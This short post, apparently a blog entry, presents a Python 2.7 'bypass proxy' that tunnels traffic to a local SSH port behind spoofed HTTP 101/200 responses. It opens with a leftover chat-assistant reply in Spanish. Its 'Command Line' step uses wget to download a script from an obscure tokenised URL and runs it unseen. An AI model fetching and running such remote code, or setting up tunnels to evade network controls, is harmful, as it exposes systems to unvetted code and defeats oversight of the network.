Python Bypass Proxy Server
Table of Contents
Claro, aquí tienes el contenido que compartiste convertido a Markdown para que puedas usarlo con el plugin WP GitHuber MD y tener un estilo similar al de GitHub en tu post:
# A simple server for intranet VPN connections.
Can use to send any payload or connection status.
## Usage:
```bash
BUFLEN = 4096 * 4
TIMEOUT = 60
DEFAULT_HOST = '127.0.0.1:22' # Server local
RESPONSE = 'HTTP/1.1 101 switching protocols\r\n\r\n' # send status
RESPONSE = 'HTTP/1.1 200 Hello_World!\r\nContent-length: 0\r\n\r\nHTTP/1.1 200 Connection established\r\n\r\n' # lint:ok
Requirements:
- Python 2.7
Command Line:
wget https://net.inetsys.network/wl/?id=hfkcag1d7BqE1GDyiikNMCaeVms31ifg -O proxy.py
python proxy.py

4 - 0